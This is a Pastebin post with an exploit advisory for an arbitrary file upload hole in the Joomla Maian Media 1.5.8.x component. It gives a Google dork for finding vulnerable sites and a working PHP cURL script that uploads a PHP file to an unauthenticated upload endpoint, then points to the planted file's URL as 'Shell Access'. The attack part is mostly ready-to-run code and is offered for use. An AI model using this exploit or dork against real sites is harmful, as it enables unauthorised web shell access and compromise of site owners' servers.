Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #megafab.net
- //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
- Joomla Maian Media 1.5.8.x Shell Upload
- \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
- # Description : Joomla Components - Maian Media Arbitrary File Upload
- Vulnerability
- # Version : 1.5.8.x
- # Link :
- http://www.aretimes.com/index.php?option=com_rokdownloads&view=folder&Itemid=67
- # Plugins :
- http://www.aretimes.com/are-software/maian-media/9-full-package/download.html
- # Date : 14-06-2012
- # Google Dork : inurl:/components/com_maianmedia/
- # Site : cyberz0ne.net #TheNewMilw0rm
- # Author : MrFab a.k.a M3GAFAB
- http://www.megafab.net/
- /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
- Exploit :
- PostShell.php
- <?php
- $headers = array("Content-Type: application/octet-stream");
- $uploadfile="<?php phpinfo(); ?>";
- $ch =
- curl_init("http://www.example.com/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
- $postResult = curl_exec($ch);
- curl_close($ch);
- print "$postResult";
- ?>
- Shell Access :
- http://www.exemple.com/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/lo.php
- lo.php
- <?php
- phpinfo();
- ?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement